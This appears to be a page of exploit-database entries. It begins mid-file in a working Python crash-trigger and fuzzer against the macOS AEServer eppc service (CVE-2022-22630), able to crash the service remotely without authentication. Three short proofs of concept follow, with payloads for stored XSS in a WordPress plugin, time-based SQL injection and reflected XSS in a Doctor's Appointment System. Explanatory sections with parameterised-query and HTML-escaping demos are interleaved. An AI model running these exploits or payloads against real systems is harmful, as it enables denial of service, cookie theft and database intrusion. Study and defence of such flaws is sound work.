but as mentioned<br /># extensive testing was required to gain more precise control of rax/rcx. Also note<br /># that authentication is not required to trigger crashes service locally or remotely.<br />#<br /># =======<br /># Details<br /># =======<br />#<br /># Much of the functionality depends on running this locally on the target box, such<br /># as debugging with ReportCrash logs, but it can certainly trigger remote crashes too<br /># if you pass the --remote flag (disables local debugging stuff).<br />#<br /># $ ./naval.py 10.0.0.12 --fuzz // use --original to fuzz with the non-crashing packets<br /># ....<br />#<br /># $ head crashes.txt<br /># 1 - (0x7e @ 1) -> 0x20<br /># [many more truncated]<br />#<br /># $ ./naval.py 10.0.0.12 --sleep --replay "1:7e:1" // pkt:byte:index<br /># ....<br />#<br /># Then within 10 seconds, start the debugger on the local target.. GOGOGO<br />#<br /># $ sudo lldb -o "attach --name AEServer" -o c<br /># ....<br />#<br /># (lldb) c<br /># Process 50050 resuming<br /># Process 50050 stopped<br /># * thread #1, queue = 'com.apple.main-thread', stop reason = EXC_BAD_ACCESS (code=1, address=0x7fd1d0e1bd8)<br /># frame #0: 0x00007fff2028341f libobjc.A.dylib`objc_release + 31<br />#<br /># And now you can explore the crash<br />#<br /># One can also check to see AEServer receving packets:<br /># > dtrace -n 'syscall::*recv*:entry { printf("-> %s (pid=%d)", execname, pid); }' | grep AEServer<br />#<br /># ===<br /># Fix<br /># ===<br /># - Addressed in Monterey 12.3<br />#<br /># CVE-2022-22630<br />#<br /><br />import os<br />import sys<br />import argparse<br />import datetime<br />import time<br />import psutil<br />import shutil<br />import signal<br />import socket<br />import random<br />import re<br /><br />REPORT_DIR = '/Library/Logs/DiagnosticReports'<br />LOG_DIR = 'logs'<br /><br />PORT = 3031 # eppc<br /><br />CRASH_LOG = 'crashes' + str(datetime.datetime.now().strftime("%Y%m%d_%H%M%S")) + '.txt'<br />REPORT_CRASH = 
True<br />SLEEP_TIME = 10<br />MAX_BYTE = 255 # 0xff<br /><br />#<br /># original packets<br />#<br />PKT_1_ORIG = b'PPCT\x00\x00\x00\x01\x00\x00\x00\x01'<br />PKT_2_ORIG = b'\xe4LPRT\x01\xe1\x01\xe7\x06finder\xdf\xdb\xe3\x02\x01=\xdf\xdf\xdf\xdf\xd5\x00'<br />PKT_3_ORIG = b'\xe4SREQ\xdf\xdf\xdf\xdf\xdf\x01\xe7\x06finder\xdf\xdb\xe5\x04B{\xbf\xac\xdf\xdf\xdf\xdf\xdf\xdf\xdf\xdf\xdc\xe5\x04test\xdf\xdd\x00'<br />PKT_4_ORIG = b'\x16\x03\x01\x00\x92\x01\x00\x00\x8e\x03\x03\x61\x00\x8b\x66\x96\xc7\x08\xa2\xe8\x0e\x53\x13\xbd\xd3\x1c\x69\x12\x43\xd3\x03\xe2\xec\x8d\x61\x3d\x01\xed\x67\xd7\x62\xf8\xca\x00\x00\x2c\x00\xff\xc0\x2c\xc0\x2b\xc0\x24\xc0\x23\xc0\x0a\xc0\x09\xc0\x08\xc0\x30\xc0\x2f\xc0\x28\xc0\x27\xc0\x14\xc0\x13\xc0\x12\x00\x9d\x00\x9c\x00\x3d\x00\x3c\x00\x35\x00\x2f\x00\x0a\x01\x00\x00\x39\x00\x0a\x00\x08\x00\x06\x00\x17\x00\x18\x00\x19\x00\x0b\x00\x02\x01\x00\x00\x0d\x00\x12\x00\x10\x04\x01\x02\x01\x05\x01\x06\x01\x04\x03\x02\x03\x05\x03\x06\x03\x00\x05\x00\x05\x01\x00\x00\x00\x00\x00\x12\x00\x00\x00\x17\x00\x00'<br />PKT_5_ORIG = b'\x16\x03\x03\x00\x46\x10\x00\x00\x42\x41\x04\x8d\xd9\xbc\x5f\x9b\x0d\x86\x28\xda\x1f\xba\x75\xe3\x01\x06\x73\xf4\x28\xe2\xe5\x9b\x2e\xfc\x75\x0c\xad\x3d\x7d\xc8\x59\xc0\x20\xce\xcb\xdf\x87\x88\x09\x46\x1f\xf3\x97\x3f\xb8\xd1\xc8\xf5\x4b\xa9\x9f\xdc\xae\xba\x75\x50\xfa\x96\xd5\xcf\xa2\xa4\xec\x7b\x61'<br /><br />#<br /># crashing packets<br />#<br />PKT_1 = b'PPCT\x00\x00\x00\x01\x00\x00\x00\x01'<br />PKT_2 = b'\xe4LPRT\x01\xe1\x01\xe7\x06xxxyyy\xdf\xdb\xe3\x02\x01=\xdf\xdf\xdf\xdf\xd5\x00' # s/finder/xxxyyy<br /><br />class Naval(object):<br /> def __init__(self, args):<br /> self.host = args.host<br /> self.fuzz = args.fuzz<br /> self.replay = args.replay<br /> self.remote = args.remote<br /> self.reprofile = args.reprofile<br /> self.original = args.original<br /> self.sleep = args.sleep<br /><br /> self.pkt1 = None<br /> self.pkt2 = None<br /><br /> # original<br /> self.pkt3 = None<br /> self.pkt4 = None<br /> self.pkt5 = 
None<br /><br /> self.pkt_pick = 0<br /><br /> self.pkt_num = None<br /> self.byte = None<br /> self.index = None<br /><br /> self.logs = []<br /><br /> def run(self):<br /> if(self.remote):<br /> REPORT_CRASH = False<br /> else:<br /> REPORT_CRASH = True<br /><br /> if(REPORT_CRASH):<br /> #<br /> # sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist<br /> #<br /> if('ReportCrash' not in (proc.name() for proc in psutil.process_iter())):<br /> print("ReportCrash isn't running, make sure it's enabled first\n")<br /> return -1<br /><br /> if(os.path.isdir(REPORT_DIR)):<br /> try:<br /> logs = os.listdir(REPORT_DIR)<br /> except Exception as error:<br /> print("failed to list %s: %s\n" % (REPORT_DIR, error))<br /> return -1<br /> else:<br /> print("dir %s doesn't exist, can't fuzz and check for crashes\n" % REPORT_DIR)<br /> return -1<br /><br /> if(self.original):<br /> # non-crashing<br /> self.pkt1 = PKT_1_ORIG<br /> self.pkt2 = PKT_2_ORIG<br /> self.pkt3 = PKT_3_ORIG<br /> self.pkt4 = PKT_4_ORIG<br /> self.pkt5 = PKT_5_ORIG<br /> else:<br /> # crashing<br /> self.pkt1 = PKT_1<br /> self.pkt2 = PKT_2<br /><br /> if(self.replay):<br /> if(len(self.replay.split(':')) != 3):<br /> print("invalid replay format: %s" % self.replay)<br /> return -1<br /><br /> replay = self.replay.split(':')<br /><br /> try:<br /> self.pkt_num = int(replay[0])<br /> except Exception as error:<br /> print("packet number %s is invalid: %s", (pkt_num, error))<br /> return -1<br /><br /> try:<br /> self.byte = int(replay[1], 16)<br /> except Exception as error:<br /> print("byte %s is invalid: %s", (byte, error))<br /> return -1<br /><br /> try:<br /> self.index = int(replay[2])<br /> except Exception as error:<br /> print("index %s is invalid: %s", (index, error))<br /> return -1<br /><br /> if(self.pkt_num == 1):<br /> pkt = self.modifyPacket(self.pkt1, self.byte, self.index)<br /><br /> if(pkt == None):<br /> return -1<br /> elif(self.pkt_num == 2):<br /> pkt = 
self.modifyPacket(self.pkt2, self.byte, self.index)<br /><br /> if(pkt == None):<br /> return -1<br /> else:<br /> print("pkt number must be 1 or 2")<br /> return -1<br /><br /> print("replaying packets\n")<br /><br /> self.showRepro(pkt)<br /><br /> if(self.reprofile):<br /> if(self.repro(self.reprofile) < 0):<br /> print("failed")<br /> return -1<br /><br /> return 0<br /><br /> #<br /> # fuzz each packet one after another<br /> #<br /> if(self.fuzz):<br /> print("fuzzing sequentially packet 1\n")<br /><br /> self.pkt_num = 1<br /><br /> if(self.fuzzPacketSeq(self.pkt1) < 0):<br /> print("failed")<br /> return -1<br /><br /> print("fuzzing sequentially packet 2\n")<br /><br /> self.pkt_num = 2<br /><br /> if(self.fuzzPacketSeq(self.pkt2) < 0):<br /> print("failed")<br /> return -1<br /><br /> if(self.original):<br /> self.pkt_num = 3<br /><br /> if(self.fuzzPacketSeq(self.pkt3) < 0):<br /> print("failed")<br /> return -1<br /><br /> self.pkt_num = 4<br /><br /> if(self.fuzzPacketSeq(self.pkt4) < 0):<br /> print("failed")<br /> return -1<br /><br /> self.pkt_num = 5<br /><br /> if(self.fuzzPacketSeq(self.pkt5) < 0):<br /> print("failed")<br /> return -1<br /> else:<br /> if(not self.replay):<br /> if(self.original):<br /> print("sending original packets for testing\n")<br /> else:<br /> print("sending packets to trigger crash\n")<br /><br /> self.showRepro([])<br /><br /> sock = self.getSock()<br /><br /> if(sock == None):<br /> return -1<br /><br /> try:<br /> sock.connect((self.host, PORT))<br /> except Exception as error:<br /> print("connect() failed: %s\n" % error)<br /> return -1<br /><br /> if(self.sleep):<br /> time.sleep(SLEEP_TIME)<br /><br /> try:<br /> sock.send(self.pkt1)<br /> sock.recv(256)<br /> except Exception as error:<br /> print("failed to send/recv packet 1: %s\n" % error)<br /> return -1<br /><br /> try:<br /> sock.send(self.pkt2)<br /> except Exception as error:<br /> print("failed to send packet 2: %s\n" % error)<br /> return -1<br /><br 
/> if(self.original):<br /> try:<br /> sock.send(PKT_3_ORIG)<br /> except Exception as error:<br /> print("failed to send packet 3: %s\n" % error)<br /> return -1<br /><br /> try:<br /> sock.send(PKT_4_ORIG)<br /> except Exception as error:<br /> print("failed to send packet 4: %s\n" % error)<br /> return -1<br /><br /> try:<br /> sock.send(PKT_5_ORIG)<br /> except Exception as error:<br /> print("failed to send packet 5: %s\n" % error)<br /> return -1<br /><br /> sock.close()<br /><br /> if(REPORT_CRASH):<br /> self.checkReports()<br /><br /> print("done\n")<br /><br /> return 0<br /><br /> def getSock(self):<br /> try:<br /> sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> sock.settimeout(1)<br /> except Exception as error:<br /> print("socket() failed: %s\n" % error)<br /> return None<br /><br /> return sock<br /><br /> def fuzzPacketSeq(self, packet):<br /> c = 0<br /> i = 0<br /><br /> #<br /> # flip each byte in the packet sequentially from 0 ... 255<br /> #<br /> while(i < len(packet)):<br /> while(c <= MAX_BYTE):<br /> pkt = bytearray(packet)<br /><br /> self.index = i<br /> self.byte = c<br /><br /> orig = pkt[self.index]<br /> pkt[self.index] = self.byte<br /><br /> print("pkt @ index=%d (%s -> %s)" % (self.index, hex(orig), hex(pkt[self.index])))<br /><br /> sock = self.getSock()<br /><br /> if(sock == None):<br /> return -1<br /><br /> try:<br /> sock.connect((self.host, PORT))<br /> except Exception as error:<br /> print("connect() failed: %s\n" % error)<br /> continue<br /><br /> if(self.sendPacket(sock, pkt) < 0):<br /> print("sendPacket() failed\n")<br /> return -1<br /><br /> sock.close()<br /><br /> self.showRepro(pkt)<br /><br /> if(REPORT_CRASH):<br /> self.checkReports()<br /><br /> c += 1<br /><br /> c = 0<br /> i += 1<br /><br /> return 0<br /><br /> def createPacket(self, pkt_name):<br /> n = random.randint(8,4096)<br /><br /> print("created \\x42 x %d for %s\n" % (n, pkt_name))<br /><br /> return str.encode('B' * n)<br /><br 
/>
    def modifyPacket(self, pkt, byte, index):
        if((index < 0) or (index >= len(pkt))):
            print("index must be 0 - %d\n" % (len(pkt)-1))
            return -1

        pkt = pkt[:index] + bytes([byte]) + pkt[index + 1:]

        return pkt

    def sendPacket(self, sock, pkt):
        try:
            if(self.pkt_pick == 1):
                sock.send(pkt)
            else:
                sock.send(self.pkt1)

            sock.recv(256)
        except socket.timeout:
            print("timed out")
        except Exception as error:
            print("send/recv failed for packet #1: %s\n" % error)

        try:
            if(self.pkt_pick == 2):
                sock.send(pkt)
            else:
                sock.send(self.pkt2)

            if(self.original):
                sock.recv(256) # not necessary for crashing packets 1 & 2
        except Exception as error:
            print("send/recv failed for packet #2: %s\n" % error)

        if(self.original):
            try:
                if(self.pkt_pick == 3):
                    sock.send(pkt)
                else:
                    pick = random.randint(1,2)

                    #
                    # pick=1 means self.pkt3 doesn't change
                    #

                    if(pick == 2):
                        self.pkt3 = self.createPacket('pkt3')

                    sock.send(self.pkt3)

                sock.recv(256)
            except Exception as error:
                print("send/recv failed for packet #3: %s\n" % error)

            try:
                if(self.pkt_pick == 4):
                    sock.send(pkt)
                else:
                    pick = random.randint(1,2)

                    if(pick == 2):
                        self.pkt4 = self.createPacket('pkt4')

                    sock.send(self.pkt4)

                sock.recv(256)
            except Exception as error:
                print("send/recv failed for packet #4: %s\n" % error)

            try:
                if(self.pkt_pick == 5):
                    sock.send(pkt)
                else:
                    pick = random.randint(1,2)

                    if(pick == 2):
                        self.pkt5 = self.createPacket('pkt5')

                    sock.send(self.pkt5)

                sock.recv(256)
            except Exception as error:
                print("send/recv failed for packet #5: %s\n" % error)

        return 0

    def repro(self, filename):
        print("reproing crash with %s\n" % os.path.basename(filename))

        try:
            with open(filename, 'r') as file:
                data = file.readlines()
        except Exception as error:
            print("failed to read file %s: %s" % (filename, error))
            return -1

        try:
            # repro files hold one packet per line as \xNN escapes (see getHex)
            self.pkt1 = bytes.fromhex(data[0].replace('\\x', ''))
            self.pkt2 = bytes.fromhex(data[1].replace('\\x', ''))

            if(self.original):
                self.pkt3 = bytes.fromhex(data[2].replace('\\x', ''))
                self.pkt4 = bytes.fromhex(data[3].replace('\\x', ''))
                self.pkt5 = bytes.fromhex(data[4].replace('\\x', ''))
        except Exception as error:
            print("failed to parse repro: %s" % error)
            return -1

        sock = self.getSock()

        if(sock == None):
            return -1

        try:
            sock.connect((self.host, PORT))
        except Exception as error:
            print("connect() failed: %s\n" % error)
            return -1

        if(self.sleep):
            time.sleep(SLEEP_TIME)

        try:
            sock.send(self.pkt1)
            sock.recv(256)
        except socket.timeout:
            print("timed out")
        except Exception as error:
            print("send/recv failed for packet #1: %s\n" % error)

        try:
            sock.send(self.pkt2)

            if(self.original):
                sock.recv(256) # not necessary for crashing packets 1 & 2
        except Exception as error:
            print("send/recv failed for packet #2: %s\n" % error)

        if(self.original):
            try:
                sock.send(self.pkt3)
                sock.recv(256)
            except Exception as error:
                print("send/recv failed for packet #3: %s\n" % error)

            try:
                sock.send(self.pkt4)
                sock.recv(256)
            except Exception as error:
                print("send/recv failed for packet #4: %s\n" % error)

            try:
                sock.send(self.pkt5)
                sock.recv(256)
            except Exception as error:
                print("send/recv failed for packet #5: %s\n" % error)

        sock.close()

        self.showRepro([])

        if(REPORT_CRASH):
            self.checkReports()

        print("done\n")

        return 0

    def getHex(self, data):
        return ''.join(f'\\x{byte:02x}' for byte in data)

    def printHex(self, data):
        print(''.join(f'\\x{byte:02x}' for byte in data))

    def showRepro(self, pkt):
        if(len(pkt) == len(self.pkt1)):
            self.printHex(pkt)
        else:
            self.printHex(self.pkt1)

        if(len(pkt) == len(self.pkt2)):
            self.printHex(pkt)
        else:
            self.printHex(self.pkt2)

        if(self.original):
            if(len(pkt) == len(self.pkt3)):
                self.printHex(pkt)
            else:
                self.printHex(self.pkt3)

            if(len(pkt) == len(self.pkt4)):
                self.printHex(pkt)
            else:
                self.printHex(self.pkt4)

            if(len(pkt) == len(self.pkt5)):
                self.printHex(pkt)
            else:
                self.printHex(self.pkt5)

        print()

        #
        # restore original packets
        #
        self.pkt3 = PKT_3_ORIG
        self.pkt4 = PKT_4_ORIG
        self.pkt5 = PKT_5_ORIG

    def checkReports(self):
        time.sleep(2) # make sure ReportCrash has time to do its thing

        try:
            logs_now = os.listdir(REPORT_DIR)
        except Exception as error:
            print("failed to open %s for reading: %s\n" % (REPORT_DIR, error))
            return -1

        if(len(logs_now) > len(self.logs)):
            logs_new = list(set(logs_now) - set(self.logs))

            #
            # if we have new crash logs, grab the pc and correlate it with repro
            #
            for log in logs_new:
                if(log.startswith('AEServer') and log.endswith('.crash')):
                    log_file = REPORT_DIR + os.sep + log

                    try:
                        with open(log_file, 'r') as file:
                            data = file.read()
                    except Exception as error:
                        print("failed to read %s: %s\n" % (log, error))
                        return -1

                    pc = re.search('0x(.*)', data)

                    if(pc != None):
                        pc = '0x' + pc.group(1).lstrip('0')
                    else:
                        print("couldn't get pc from crash log\n")

                    print("found crash @ pc=%s\n" % pc)

                    #
                    # create a crash log if we're fuzzing or replaying bytes at indices
                    #
                    if(self.fuzz):
                        crash_info = 'pkt #' + str(self.pkt_num) + ' - (byte=' + hex(self.byte) + ' @ index=' + str(self.index) + ') -> ' + pc + '\n'

                        try:
                            with open(CRASH_LOG, 'a') as file:
                                file.write(crash_info)
                        except Exception as error:
                            print("failed to write %s: %s\n" % (CRASH_LOG, error))
                            return -1

                    if(not os.path.isdir(LOG_DIR)):
                        try:
                            os.mkdir(LOG_DIR)
                        except Exception as error:
                            print("failed to mkdir %s: %s\n" % (LOG_DIR, error))

                    log_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + str(self.byte) + '_' + str(self.index) + '_' + pc + '.txt'

                    #
                    # move crash log file
                    #
                    try:
                        shutil.move(log_file, log_name)
                    except Exception as error:
                        print("failed to move %s: %s\n" % (log_file, error))
                        return -1

                    ips_file = REPORT_DIR + os.sep + log.split('.')[0] + '.ips'

                    # named after the .ips itself so it does not overwrite the .crash moved above
                    ips_name = LOG_DIR + os.sep + os.path.basename(ips_file) + '_' + str(self.byte) + '_' + str(self.index) + '_' + pc + '.txt'

                    #
                    # check if there's an associated .ips
                    #
                    if(os.path.isfile(ips_file)):
                        try:
                            # shutil.move(ips_file, LOG_DIR)
                            shutil.move(ips_file, ips_name)
                        except Exception as error:
                            print("failed to move %s: %s\n" % (ips_file, error))
                            return -1

                    #
                    # write repro if random fuzzing (no byte/index to replay)
                    #
                    # note: possible bug somewhere preventing pkt 3-5 from saving the correct repro,
                    # (eg. if mutated with B's), so for now we're just extra verbose with output when
                    # mutating packets and stop if pc contains 424242 so we can debug from there
                    #
                    repro_name = LOG_DIR + os.sep + os.path.basename(log_file) + '_' + pc + '_' + 'repro' + '.txt'

                    try:
                        with open(repro_name, 'w') as file:
                            file.write(self.getHex(self.pkt1))
                            file.write('\n')
                            file.write(self.getHex(self.pkt2))

                            if(self.original):
                                file.write('\n')
                                file.write(self.getHex(self.pkt3))
                                file.write('\n')
                                file.write(self.getHex(self.pkt4))
                                file.write('\n')
                                file.write(self.getHex(self.pkt5))
                    except Exception as error:
                        print("failed to write %s: %s\n" % (repro_name, error))
                        return -1

                    #
                    # temporary to help triage crashing packets
                    #
                    if('424242' in pc):
                        self.showRepro([])
                        sys.exit(0)

            #
            # reset logs after move
            #
            try:
                self.logs = os.listdir(REPORT_DIR)
            except Exception as error:
                print("failed to list %s: %s\n" % (REPORT_DIR, error))
                return -1

        return 0

def stop(signum, frame):
    print()
    sys.exit(0)

def arg_parse():
    parser = argparse.ArgumentParser()

    parser.add_argument("host",
                        type=str,
                        help="target listening on eppc port 3031")

    parser.add_argument("--fuzz",
                        default=False,
                        action="store_true",
                        help="sequentially exhaust bytes in each packet and display crashing PC as available")

    parser.add_argument("--remote",
                        default=False,
                        action="store_true",
                        help="target remote hosts and disable local debugging support")

    parser.add_argument("--replay",
                        type=str,
                        help="replay crash with the following format [pkt:byte:index], eg. 2:ff:3")

    parser.add_argument("--reprofile",
                        type=str,
                        help="filename containing packet data on each line to replay (generated by random fuzzing)")

    parser.add_argument("--original",
                        default=False,
                        action="store_true",
                        help="use the original non-crashing packets")

    parser.add_argument("--sleep",
                        default=False,
                        action="store_true",
                        help="sleep helper for time to lldb attach after launchd creates the AEServer process upon connection (10 secs)")

    args = parser.parse_args()

    return args

def main():
    signal.signal(signal.SIGINT, stop)

    args = arg_parse()

    nr = Naval(args)

    result = nr.run()

    if(result > 0):
        sys.exit(-1)

if(__name__ == '__main__'):
    main()
</code></pre>
<pre><code># Exploit Title: Stored XSS in post_title parameter in WordPress Plugin "Netroics Blog Posts Grid" v1.0
# Date: 08/08/2022
# Exploit Author: saitamang, syad, yunaranyancat
# Vendor Homepage: wordpress.org
# Software Link: https://downloads.wordpress.org/plugin/netroics-blog-posts-grid.zip
# Version: 1.0
# Tested on: Centos 7 apache2 + MySQL

WordPress Plugin "Netroics Blog Posts Grid" is prone to a stored cross-site scripting (XSS) vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. WordPress Plugin "Netroics Blog Posts Grid" version 1.0 is vulnerable; prior versions may also be affected.

Log in as Editor > Add testimonial > under Title, inject the payload below (post_title parameter) > Save Draft > Preview the post


payload --> user s1"><img src=x onerror=alert(document.cookie)>.gif


The draft post can be viewed by another Editor or Admin account, and the stored XSS will be triggered.

Further information can be previewed on GitHub below:
https://github.com/saitamang/POC-DUMP/blob/main/wordpress/Netroics%20Blog%20Posts%20Grid%20v1.0%20Stored%20XSS.md
</code></pre>
<pre><code># Exploit Title: SQLi - Doctor's Appointment System v1.0
# Google Dork: N/A
# Date: 7/13/2022
# Exploit Author: Abdullah Zaid - @_aznull
# Vendor Homepage:
https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip
# Version: 1.0
# Tested on: Linux
# CVE : CVE-2022-36201


POC:

http://localhost/edoc/patient/booking.php?id=1%20AND%20(SELECT%203436%20FROM%20(SELECT(SLEEP(10)))dZls)

</code></pre>
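The PoC above works because booking.php splices the id parameter into the SQL text, so the decoded payload `1 AND (SELECT 3436 FROM (SELECT(SLEEP(10)))dZls)` is parsed as SQL and the SLEEP call runs on the database server. The following is an added example, not code from the Doctor's Appointment System project: it reproduces the concatenation pattern against a constructed in-memory SQLite table, with a counting stub registered under the name SLEEP (SQLite has no built-in SLEEP; the stub and the doctor table are assumptions), and puts the parameterised query that fixes the issue beside it.

```python
# Added example (not the project's own code): the vulnerable concatenation pattern
# beside the parameterised fix, exercised with the advisory's own payload.
import sqlite3

# Payload exactly as quoted in the advisory, URL-decoded.
ADVISORY_PAYLOAD = "1 AND (SELECT 3436 FROM (SELECT(SLEEP(10)))dZls)"


class SleepSpy:
    """Stand-in for MySQL's SLEEP(): counts invocations instead of blocking (constructed)."""

    def __init__(self):
        self.calls = 0

    def __call__(self, seconds):
        self.calls += 1
        return 0


def make_db():
    # Constructed in-memory table standing in for the application's doctor table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE doctor (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("INSERT INTO doctor VALUES (1, 'Dr. Example')")
    return conn


def lookup_unsafe(conn, booking_id):
    # The vulnerable pattern: the request parameter is concatenated into the statement,
    # so everything after the leading '1' is tokenised and executed as SQL.
    return conn.execute("SELECT id, name FROM doctor WHERE id=" + booking_id).fetchall()


def lookup_safe(conn, booking_id):
    # The fix: bind the parameter. It reaches the engine as one value, never as SQL
    # text, so the payload is just a string that matches no integer id.
    return conn.execute("SELECT id, name FROM doctor WHERE id=?", (booking_id,)).fetchall()


def run_demo():
    """Run both lookups with the payload and report whether the injected SLEEP executed."""
    spy = SleepSpy()
    conn = make_db()
    conn.create_function("SLEEP", 1, spy)

    unsafe_rows = lookup_unsafe(conn, ADVISORY_PAYLOAD)
    injected_sleep_ran = spy.calls > 0

    calls_before = spy.calls
    safe_rows = lookup_safe(conn, ADVISORY_PAYLOAD)
    safe_sleep_ran = spy.calls > calls_before

    return {
        "unsafe_rows": unsafe_rows,            # row returned: the AND clause was evaluated
        "injected_sleep_ran": injected_sleep_ran,
        "safe_rows": safe_rows,                # empty: payload compared as a value
        "safe_sleep_ran": safe_sleep_ran,
        "legit_rows": lookup_safe(conn, "1"),  # normal request still works
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Binding alone removes the injection; rejecting non-integer ids before the query (a plain int() check) is worth adding on top so that a tampered request gets a clean client error rather than an empty result. The same time-based pattern is what a WAF or database audit log would flag: a SLEEP call arriving from a request parameter that should only ever carry an integer.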
<pre><code># Exploit Title: Doctor's Appointment System v1.0 - Cross-Site Scripting (XSS)
# Google Dork: N/A
# Date: 7/13/2022
# Exploit Author: Abdullah Zaid - @_aznull
# Vendor Homepage:
https://www.sourcecodester.com/hashenudara/simple-doctors-appointment-project.html
# Software Link:
https://www.sourcecodester.com/sites/default/files/download/hshnudr/edoc-doctor-appointment-system-main_1.zip
# Version: 1.0
# Tested on: Linux
# CVE : CVE-2022-36203

POC:

POST /register.php HTTP/1.1
Host: localhost

username=a"><script>alert(1337)</script>&password=123
</code></pre>
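Both the Netroics Blog Posts Grid advisory (post_title) and the Doctor's Appointment System advisory (username) come down to the same defect: a submitted value is echoed into HTML without output encoding, so the closing quote and angle bracket in the payload end the attribute and open a new element. The following is an added example, not code from either project: a hypothetical template that renders the value in two contexts (element text and a quoted attribute), parsed with Python's stdlib HTMLParser as a stand-in for the browser, so the difference between the raw echo and HTML entity encoding is visible as the set of tags and on* handlers the parser sees. The template, the field name and the parser-based check are assumptions; the two payloads are the ones quoted in the advisories.

```python
# Added example (not code from either advisory): shows why the post_title and
# username values become markup, and that contextual output encoding stops it.
import html
from html.parser import HTMLParser

# Payloads exactly as quoted in the two advisories.
NETROICS_TITLE = 'user s1"><img src=x onerror=alert(document.cookie)>.gif'
EDOC_USERNAME = 'a"><script>alert(1337)</script>'


class TagCollector(HTMLParser):
    """Records every start tag and every on* attribute the parser sees (stand-in for the browser)."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.event_attrs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        # on* attributes are what turns injected markup into script execution
        self.event_attrs.extend(name for name, _ in attrs if name.startswith("on"))


def render(value, escape):
    """Hypothetical template with two output contexts: element text and a quoted attribute.

    escape=False mirrors the vulnerable plugin/app echoing the value verbatim;
    escape=True applies HTML entity encoding (html.escape with quote=True), which
    turns ", <, >, & and ' into entities so the value cannot leave its context.
    """
    if escape:
        value = html.escape(value, quote=True)
    return f'<h2>{value}</h2><input name="post_title" value="{value}">'


def parse(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags, collector.event_attrs


def rendered_tags(value, escape):
    """Tag names the parser sees for the rendered value; only h2 and input are legitimate."""
    return parse(render(value, escape))[0]


def rendered_event_handlers(value, escape):
    """on* attribute names the parser sees; should always be empty."""
    return parse(render(value, escape))[1]


if __name__ == "__main__":
    for field, payload in (("post_title", NETROICS_TITLE), ("username", EDOC_USERNAME)):
        for escape in (False, True):
            print(field, "escaped" if escape else "raw",
                  rendered_tags(payload, escape), rendered_event_handlers(payload, escape))
```

With the raw echo the parser sees an extra img (with an onerror handler) or script element in both contexts; with encoding it sees only the template's own h2 and input, and the payload survives as harmless text. The same escaping must be applied at every echo site, and a value destined for a JavaScript or URL context needs that context's encoder rather than HTML entities.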